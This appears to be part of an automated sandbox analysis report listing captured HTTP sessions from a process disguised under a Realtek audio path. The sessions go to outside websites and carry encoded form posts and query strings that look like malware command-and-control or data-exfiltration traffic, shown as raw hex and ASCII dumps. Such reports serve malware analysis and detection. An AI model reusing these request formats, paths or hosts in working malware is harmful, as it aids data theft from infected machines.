                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 7367
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.aballanet.cat
                                                                                                                                                                              Origin: http://www.aballanet.cat
                                                                                                                                                                              Referer: http://www.aballanet.cat/4300/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Raw: 69 53 3d 51 2f 51 35 66 52 49 2b 34 41 5a 6d 75 74 72 4c 53 69 72 44 41 4a 44 2b 74 44 36 4d 6d 6f 51 79 71 69 43 6d 41 63 7a 72 2b 6b 45 30 49 68 57 45 48 2f 57 47 52 57 43 43 56 72 79 68 54 5a 78 75 5a 52 61 42 6c 4f 4b 68 6d 50 66 31 74 69 45 69 62 67 7a 6c 67 70 6c 52 51 61 78 6a 69 2f 76 5a 35 70 4a 57 74 52 6e 74 36 39 2b 63 72 59 37 6d 6e 67 50 4e 58 6c 59 6c 30 4f 2b 72 4d 39 59 6b 63 5a 6f 62 57 67 33 46 33 5a 4e 5a 67 4d 70 45 75 69 2f 73 66 33 77 59 79 4d 61 39 44 75 77 6a 54 4d 39 38 77 67 66 70 42 42 72 7a 5a 48 5a 5a 69 38 4b 66 67 73 2f 74 65 44 63 50 48 56 6a 46 54 4d 54 72 4b 4a 75 4e 76 4a 4c 4c 48 61 47 52 35 34 72 7a 63 4c 4a 76 6e 69 66 68 67 45 49 61 68 62 47 45 6b 46 4b 6e 71 42 30 31 4d 61 6c 4a 72 52 4d 68 78 7a 69 46 51 4f 75 4c 6f 47 62 71 52 68 72 70 31 58 75 59 4e 4c 34 58 5a 53 69 63 34 64 30 77 67 37 48 30 67 4c 50 2b 7a 51 65 41 71 66 78 37 64 66 52 31 38 58 58 59 63 39 33 36 59 69 2b 2f 4f 38 35 51 2b 64 33 51 66 79 38 71 34 44 4c 7a 4e 65 51 44 41 34 55 57 4c 55 41 [TRUNCATED]
                                                                                                                                                                              Data Ascii: iS=Q/Q5fRI+4AZmutrLSirDAJD+tD6MmoQyqiCmAczr+kE0IhWEH/WGRWCCVryhTZxuZRaBlOKhmPf1tiEibgzlgplRQaxji/vZ5pJWtRnt69+crY7mngPNXlYl0O+rM9YkcZobWg3F3ZNZgMpEui/sf3wYyMa9DuwjTM98wgfpBBrzZHZZi8Kfgs/teDcPHVjFTMTrKJuNvJLLHaGR54rzcLJvnifhgEIahbGEkFKnqB01MalJrRMhxziFQOuLoGbqRhrp1XuYNL4XZSic4d0wg7H0gLP+zQeAqfx7dfR18XXYc936Yi+/O85Q+d3Qfy8q4DLzNeQDA4UWLUAYgfq0xxpPmq5bPDDKp3ngmLfNXH1+oyVvEevjpOBFtdgUVuE6JDekNjCf0rnae7t39dFe/8BHXhbfVpn2d8cQ0pWd5xnLPg0BAJ8HT7dGG0Gt/D7L8K9BO2DHCWstJO6NgMsu+Ci0/WNmUJ90gdHPW4RmODEVWT69dDP3dia0sXhSx4lqaDTv6DKlsKe29d9DysTBVqBfE9SJGhdy4v80d8oM8Njr7LUcJinXJ+s1S52hdeXobsk5Nadf5RfbmocyxFEQExqNAorACHNRVI6EJWwxymI/Mie9BcswOkXJQveWUpTV4iX9RocZzX5Y6HZOj+OKzfgrJHRXq4IhskIacYv4WjKtH/s0rZpcO0CLxS9fuSnsBreld4r7FW+hB/QnBihxJR7/ymeL4PAHcw+sw/A9P+zmCZxTDHwTMPeOLL2Kua157X6Werf9fmFOnEJbaq1G79iPjccZR0ZW2AHiKZeeIJ4ZdsuAI5qOEWjj9dqahkzirb9u0n5j0C47wowGu1TKCmbDYfPYmi0AYA4BDkzTW6Xz2If1JNcorYRFYubNLGX6k6gFEMLBi82MwFa0aJWClY92sMxfdzHAKxwXvY6jR/TDm/8TgDQxvOiF5v5NNUzuXTXp6wSVCep+ECu3fIn8qclKwWQIFWhrjedYM4X1Djs7D0K/r [TRUNCATED]
                                                                                                                                                                              Jan 11, 2025 03:58:28.826493025 CET5349OUTData Raw: 57 66 79 52 2f 32 4d 6c 75 67 73 72 36 2b 71 71 39 72 6b 49 2b 53 43 69 56 57 6e 37 6d 37 63 6c 69 6f 72 32 70 51 70 37 67 36 70 71 4a 38 41 68 6a 70 44 2b 4a 37 35 45 62 48 2f 45 6c 4b 73 48 6f 57 42 48 65 39 74 5a 55 51 56 69 7a 6e 32 54 39 78
                                                                                                                                                                              Data Ascii: WfyR/2Mlugsr6+qq9rkI+SCiVWn7m7clior2pQp7g6pqJ8AhjpD+J75EbH/ElKsHoWBHe9tZUQVizn2T9xkFXpzFB8cIw8O5EyOW4pFvE2frK3fIFOVxAe2hWZqM6fcSB2Em83CFrlCdrx5lI9Ug7yN75EfX0eYhibK3ULw+fLvsPgWfVNkoEqI18GFWm8zh/qcViRm9acTdUHLDsUwkZmSmm5wXsU+jfxOhf3a+MRYlm8yfPqJ
                                                                                                                                                                              Jan 11, 2025 03:58:29.262090921 CET1289INHTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Sat, 11 Jan 2025 02:58:28 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                              Link: <https://aballanet.cat/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                              Upgrade: h2,h2c
                                                                                                                                                                              Connection: Upgrade, close
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Data Raw: 31 34 62 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 63 61 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 50 c3 a0 67 69 6e 61 20 6e 6f 20 74 72 6f 62 61 64 61 20 2d 20 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 2c 20 41 72 71 75 69 74 65 63 74 6f 20 44 6f 63 74 6f 72 20 55 50 43 2c 20 74 72 61 79 65 63 74 6f 72 69 61 2c 20 74 65 73 69 73 20 64 65 20 65 73 74 75 64 69 6f 2c 20 70 75 62 6c 69 63 61 63 69 6f 6e 65 73 20 64 65 20 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 2c 20 4c 61 20 63 61 73 61 20 61 20 63 75 61 74 72 6f 20 76 69 65 6e 74 6f 73 20 65 6e 20 6c 61 20 [TRUNCATED]
                                                                                                                                                                              Data Ascii: 14bd<!doctype html><html lang="ca" class="no-js"> <head> <meta charset="UTF-8"> <title>Pgina no trobada - Albert Aballanet</title> <meta name="keywords" content="Albert Aballanet, Arquitecto Doctor UPC, trayectoria, tesis de estudio, publicaciones de Albert Aballanet, La casa a cuatro vientos en la Bonanova"> <link href="//www.google-analytics.com" rel="dns-prefetch"> <link href="http://aballanet.cat/wp-content/themes/rwd-theme/img/icons/touch.png" rel="apple-touch-icon-precomposed"> <link rel="alternate" type="application/rss+xml" title="Albert Aballanet" href="https://aballanet.cat/feed/" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content="Arquitecte Doctor UPC"> <meta name='robots' content='noindex,
                                                                                                                                                                              Jan 11, 2025 03:58:29.262186050 CET1289INData Raw: 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 09 3c 73 74 79 6c 65 3e 69 6d 67 3a 69 73 28 5b 73 69 7a 65 73 3d 22 61 75 74 6f 22 20 69 5d 2c 20 5b 73 69 7a 65 73 5e 3d 22 61 75 74 6f 2c 22 20 69 5d 29 20 7b 20 63 6f 6e 74 61 69 6e 2d 69 6e 74 72 69 6e 73 69
                                                                                                                                                                              Data Ascii: follow' /><style>img:is([sizes="auto" i], [sizes^="auto," i]) { contain-intrinsic-size: 3000px 1500px }</style>... This site is optimized with the Yoast SEO plugin v23.1 - https://yoast.com/wordpress/plugins/seo/ --><meta property="og
                                                                                                                                                                              Jan 11, 2025 03:58:29.262290001 CET1289INData Raw: 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 61 62 61 6c 6c 61 6e 65 74 2e 63 61 74 5c
                                                                                                                                                                              Data Ascii: i\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/aballanet.cat\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.7.1"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,times
                                                                                                                                                                              Jan 11, 2025 03:58:29.262336969 CET1289INData Raw: 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c 79
                                                                                                                                                                              Data Ascii: nCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.
                                                                                                                                                                              Jan 11, 2025 03:58:29.262371063 CET512INData Raw: 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 3d 3d 74 26 26 28 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79
                                                                                                                                                                              Data Ascii: thing&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMR
                                                                                                                                                                              Jan 11, 2025 03:58:29.262473106 CET1289INData Raw: 32 30 30 30 0d 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 65 6d 6f 6a 69 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 0a 09 69 6d 67 2e 77 70 2d 73 6d 69 6c 65 79 2c 20 69 6d 67
                                                                                                                                                                              Data Ascii: 2000<style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !important;margin: 0 0
                                                                                                                                                                              Jan 11, 2025 03:58:29.262614965 CET1289INData Raw: 72 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 61 62 61 6c 6c 61 6e 65 74 2e 63 61 74 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 63 73 73 2f 64 69 73 74 2f 65 64 69 74 6f 72 2f 73 74 79 6c 65 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e
                                                                                                                                                                              Data Ascii: r-css' href='http://aballanet.cat/wp-includes/css/dist/editor/style.min.css?ver=6.7.1' media='all' /><link rel='stylesheet' id='algori_pdf_viewer-cgb-style-css-css' href='http://aballanet.cat/wp-content/plugins/algori-pdf-viewer/dist/blocks.s
                                                                                                                                                                              Jan 11, 2025 03:58:29.262728930 CET1289INData Raw: 67 72 65 65 6e 2d 63 79 61 6e 3a 20 23 37 62 64 63 62 35 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 67 72 65 65 6e 2d 63 79 61 6e 3a 20 23 30 30 64 30 38 34 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63
                                                                                                                                                                              Data Ascii: green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to
                                                                                                                                                                              Jan 11, 2025 03:58:29.262844086 CET1289INData Raw: 6c 75 6d 69 6e 6f 75 73 2d 64 75 73 6b 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 2c 32 30 33 2c 31 31 32 29 20 30 25 2c 72 67 62 28 31 39 39 2c 38 31 2c 31 39 32 29 20 35 30 25 2c 72 67 62 28
                                                                                                                                                                              Data Ascii: luminous-dusk: linear-gradient(135deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65,88,208) 100%);--wp--preset--gradient--pale-ocean: linear-gradient(135deg,rgb(255,245,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--preset--gradient
                                                                                                                                                                              Jan 11, 2025 03:58:29.262969017 CET1289INData Raw: 20 77 72 61 70 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 7d 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 20 3e 20 3a 69 73 28 2a 2c 20 64 69 76 29 7b 6d 61 72 67 69 6e 3a 20 30 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75
                                                                                                                                                                              Data Ascii: wrap;align-items: center;}.is-layout-flex > :is(*, div){margin: 0;}body .is-layout-grid{display: grid;}.is-layout-grid > :is(*, div){margin: 0;}:where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              48192.168.11.2049806134.0.14.158806612C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 03:58:31.574815989 CET488OUTGET /4300/?iS=d94ZcmMq/ThngNvhRkyBH4O0kUOwnOVlpzbjHd6+2TtVHAifM7eyMUHxFon7bcIQfzPiuuHPlbPirzhbYxLc+qoRY5lZ+tP99KhqilPg4uPHk5PRth/KSxs=&Bi=zJ_w6yPG HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.aballanet.cat
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Jan 11, 2025 03:58:31.954672098 CET484INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                              Date: Sat, 11 Jan 2025 02:58:31 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                              X-Redirect-By: WordPress
                                                                                                                                                                              Upgrade: h2,h2c
                                                                                                                                                                              Connection: Upgrade, close
                                                                                                                                                                              Location: http://aballanet.cat/4300/?iS=d94ZcmMq/ThngNvhRkyBH4O0kUOwnOVlpzbjHd6+2TtVHAifM7eyMUHxFon7bcIQfzPiuuHPlbPirzhbYxLc+qoRY5lZ+tP99KhqilPg4uPHk5PRth/KSxs=&Bi=zJ_w6yPG
                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              49192.168.11.204980713.248.169.48806612C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 03:58:38.443126917 CET755OUTPOST /a42x/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.remedies.pro
                                                                                                                                                                              Origin: http://www.remedies.pro
                                                                                                                                                                              Referer: http://www.remedies.pro/a42x/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Raw: 69 53 3d 2b 6c 33 47 79 67 67 7a 30 35 71 76 6d 46 52 4a 4e 57 35 74 55 4d 30 71 4b 33 48 2f 76 74 49 31 53 49 4b 61 4b 48 6d 69 49 30 65 74 33 4c 49 76 2f 4a 6b 75 53 30 42 47 4f 70 46 7a 75 4a 62 41 73 31 4e 71 4b 31 38 31 61 6a 2b 65 53 56 4f 43 4e 71 53 57 4d 66 61 4d 52 37 6f 36 31 4f 49 56 45 45 2f 6c 6a 56 64 72 74 55 57 78 73 42 52 4e 66 59 59 68 41 43 49 53 63 66 4a 72 30 34 65 6b 53 4d 67 49 69 59 66 59 51 76 62 6d 4a 51 4b 74 69 4f 34 4c 2b 73 48 69 4d 31 66 42 6d 59 62 6e 2f 41 6f 59 6a 6b 70 35 56 54 7a 64 38 4f 48 52 4d 2f 78 2f 4c 4d 54 39 7a 48 2b 57 4c 36 55 55 48 67 3d 3d
                                                                                                                                                                              Data Ascii: iS=+l3Gyggz05qvmFRJNW5tUM0qK3H/vtI1SIKaKHmiI0et3LIv/JkuS0BGOpFzuJbAs1NqK181aj+eSVOCNqSWMfaMR7o61OIVEE/ljVdrtUWxsBRNfYYhACIScfJr04ekSMgIiYfYQvbmJQKtiO4L+sHiM1fBmYbn/AoYjkp5VTzd8OHRM/x/LMT9zH+WL6UUHg==
                                                                                                                                                                              Jan 11, 2025 03:58:38.580456972 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                                                                                                              content-length: 0
                                                                                                                                                                              connection: close


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              50192.168.11.204980813.248.169.48806612C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 03:58:42.125760078 CET775OUTPOST /a42x/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.remedies.pro
                                                                                                                                                                              Origin: http://www.remedies.pro
                                                                                                                                                                              Referer: http://www.remedies.pro/a42x/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Raw: 69 53 3d 2b 6c 33 47 79 67 67 7a 30 35 71 76 30 56 68 4a 64 48 35 74 46 73 30 6c 45 58 48 2f 6c 4e 4a 38 53 49 4f 61 4b 47 79 79 4c 47 71 74 33 75 4d 76 78 74 77 75 52 30 42 47 47 4a 46 36 67 70 61 43 73 31 42 59 4b 78 30 31 61 6a 71 65 53 51 79 43 4e 62 53 56 57 76 61 4b 64 62 6f 6b 37 75 49 56 45 45 2f 6c 6a 56 59 41 74 51 79 78 76 78 42 4e 65 36 67 75 66 79 49 52 64 66 4a 72 69 49 65 34 53 4d 68 64 69 5a 44 2b 51 73 6a 6d 4a 52 36 74 69 66 34 45 6c 38 48 6b 44 56 65 78 77 62 32 4d 35 41 63 6c 73 45 39 66 55 6d 71 6c 77 34 4b 4c 52 4e 46 62 49 66 50 50 33 33 48 2b 4a 34 56 50 61 6f 62 73 71 75 73 35 6e 51 32 6d 64 61 78 2f 48 43 66 33 57 6e 77 3d
                                                                                                                                                                              Data Ascii: iS=+l3Gyggz05qv0VhJdH5tFs0lEXH/lNJ8SIOaKGyyLGqt3uMvxtwuR0BGGJF6gpaCs1BYKx01ajqeSQyCNbSVWvaKdbok7uIVEE/ljVYAtQyxvxBNe6gufyIRdfJriIe4SMhdiZD+QsjmJR6tif4El8HkDVexwb2M5AclsE9fUmqlw4KLRNFbIfPP33H+J4VPaobsqus5nQ2mdax/HCf3Wnw=
                                                                                                                                                                              Jan 11, 2025 03:58:42.261383057 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                                                                                                              content-length: 0
                                                                                                                                                                              connection: close


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              51192.168.11.204980913.248.169.48806612C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 03:58:45.797969103 CET2578OUTPOST /a42x/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 7367
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.remedies.pro
                                                                                                                                                                              Origin: http://www.remedies.pro
                                                                                                                                                                              Referer: http://www.remedies.pro/a42x/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Raw: 69 53 3d 2b 6c 33 47 79 67 67 7a 30 35 71 76 30 56 68 4a 64 48 35 74 46 73 30 6c 45 58 48 2f 6c 4e 4a 38 53 49 4f 61 4b 47 79 79 4c 47 53 74 77 59 77 76 78 4b 63 75 51 30 42 47 4d 70 46 33 67 70 62 61 73 31 5a 6d 4b 78 35 58 61 68 53 65 51 79 4b 43 4c 76 4f 56 59 66 61 4b 41 4c 6f 35 31 4f 49 4d 45 45 76 68 6a 56 49 41 74 51 79 78 76 30 46 4e 58 49 59 75 5a 79 49 53 63 66 4a 6e 30 34 65 45 53 4d 59 71 69 5a 48 49 51 39 44 6d 4a 78 71 74 6b 74 67 45 70 38 48 6d 41 56 65 70 77 62 36 54 35 45 45 54 73 45 4a 68 55 68 32 6c 6a 63 4c 70 4a 4d 4a 33 66 5a 48 6c 2f 31 6e 6b 41 62 70 59 59 5a 58 4c 37 73 4d 44 6a 55 2b 39 5a 4d 68 75 57 42 53 32 4d 48 4b 66 61 77 79 4e 42 54 37 74 56 6c 4c 43 69 55 69 63 2f 6b 36 58 74 4b 58 52 73 68 4d 47 31 76 7a 53 44 75 67 57 2b 4d 4a 41 57 38 6f 48 39 48 30 41 55 6a 45 5a 30 71 4b 36 48 45 6c 76 6e 43 4d 50 59 7a 39 62 51 4f 64 57 5a 71 78 44 45 46 2b 53 46 33 69 45 41 76 53 6e 54 64 65 45 77 43 7a 44 52 43 6a 62 32 55 30 6d 57 61 6e 4c 53 43 48 6d 79 32 71 54 49 62 36 [TRUNCATED]
                                                                                                                                                                              Data Ascii: iS=+l3Gyggz05qv0VhJdH5tFs0lEXH/lNJ8SIOaKGyyLGStwYwvxKcuQ0BGMpF3gpbas1ZmKx5XahSeQyKCLvOVYfaKALo51OIMEEvhjVIAtQyxv0FNXIYuZyIScfJn04eESMYqiZHIQ9DmJxqtktgEp8HmAVepwb6T5EETsEJhUh2ljcLpJMJ3fZHl/1nkAbpYYZXL7sMDjU+9ZMhuWBS2MHKfawyNBT7tVlLCiUic/k6XtKXRshMG1vzSDugW+MJAW8oH9H0AUjEZ0qK6HElvnCMPYz9bQOdWZqxDEF+SF3iEAvSnTdeEwCzDRCjb2U0mWanLSCHmy2qTIb6FEFk2U7V/5p3HYWdfH5aQFyuZoZH1y0nIljx9EtW4AbsY2xDsRzsiaIZMCWpvbc5rv+iT06L/xOs7JSsyyKYxTdJcaMwsL3SuR67zChCQ0FKS+EXGfQnYCaS6K1HCyT+HotLDljKIY3K89E9oj68MG3/snhrJ0YZFpEurG+cP47xbGZ9X/ynFmx8zWqlelr3dKy5Zw0d3wizYQkaUOIAPTCjDJGc21yq/VKxr3DoVmyEQ57xHo78GVKFP4LuMCdhbtjBwaLdWXJXhQ698Vaq60bOmWxy3zFURMOXZuFTIBkS9rUCEnbtiaiVufPJ12583Sp/B3YKnhsdZYTTQQOv45/Re0HSSzLup1Y+yooBoUTNSLU3i80Z/RcYZZtJsSU08HMf+lO1TD6ixZw0fSOPqo5otXpiyUw737raAk2ouPQPe2g56kVdggXrzRCsmPqUHh8xpUUpejMQLamzmkgIybZdHcuZEY315+x5fptl5srRlZOHNmKiILmt/GwMdA2QL9Oyigc3fHI3H+lT8wvXHweJCMADh5qUdElRPPcsPLQz9rRw63SDDhfCAbImS/FL2wZW0b6mt//rbp9mEackgt0tCRB5BCRxCa0kP0YAjISl4RAk6ERss5b5vTbv8MubfSHgZUnoX1xcYE47ndVM8+b7lc/kNv+e1S [TRUNCATED]
                                                                                                                                                                              Jan 11, 2025 03:58:45.797992945 CET2578OUTData Raw: 38 4e 52 50 30 4b 6f 54 4a 48 4e 65 62 6d 33 2b 33 63 59 52 69 5a 50 72 30 38 6e 77 74 6b 31 76 6a 75 65 64 6e 48 43 41 68 41 46 4d 43 52 6a 41 5a 74 63 77 46 62 2b 4d 68 35 43 53 45 70 76 7a 57 54 4c 66 6f 6a 4f 64 32 49 75 4e 43 56 37 65 4c 52
                                                                                                                                                                              Data Ascii: 8NRP0KoTJHNebm3+3cYRiZPr08nwtk1vjuednHCAhAFMCRjAZtcwFb+Mh5CSEpvzWTLfojOd2IuNCV7eLR2yeuOl4G2Rw+ML2T6P4PIwey4Lzz72bhTknEnKumGyINL3BB4bEwPd3wCAWevL0RqiKM6spZ+h0WGAQScDjslz//m75eAXdaiy8axCv3uq4hj6xmuA0A9RQoNXktJlBjvJRlrg3RSV2K2KW3d/2qmSz6bpQPUOJc+
                                                                                                                                                                              Jan 11, 2025 03:58:45.934653044 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                                                                                                              content-length: 0
                                                                                                                                                                              connection: close
                                                                                                                                                                              Jan 11, 2025 03:58:45.934839010 CET2578OUTData Raw: 6f 65 32 61 47 69 79 6c 4f 71 38 4c 68 77 64 57 47 58 55 68 62 34 77 70 46 63 6e 36 78 43 6d 50 54 4c 79 35 39 50 47 55 77 64 36 61 78 48 6a 30 64 55 4c 47 32 4e 79 31 4c 2b 6d 34 64 6a 6c 62 6a 4a 6a 38 61 6f 62 41 4c 52 67 7a 41 6e 53 64 77 41
                                                                                                                                                                              Data Ascii: oe2aGiylOq8LhwdWGXUhb4wpFcn6xCmPTLy59PGUwd6axHj0dULG2Ny1L+m4djlbjJj8aobALRgzAnSdwA3hvS+FPjQntxn3QmGuQ5eXqz7o17A4IC6FCd6vO7YtJ7BwCFD4b1xlRNJZuJW9Fp7cIwlr9q/6WtDqSZh+3M0RNEpGFJs+JvXDicCljPC3EUseFs1//5CjdJC7u/VkFXiIeSrc+Iq55BDEH0z2EqG1oe/Bh9sb/vt
                                                                                                                                                                              Jan 11, 2025 03:58:45.935010910 CET190OUTData Raw: 6f 66 71 77 4f 6f 55 63 4d 69 68 31 41 71 66 66 4d 2f 31 43 74 55 6c 55 6a 42 32 6f 52 61 6f 4a 66 6a 6d 6f 72 4e 2f 50 31 69 57 6f 31 31 42 47 69 54 49 6e 33 49 54 78 4a 6d 6c 31 44 51 56 68 35 74 58 64 50 2f 41 37 53 4a 76 75 33 64 46 62 41 4c
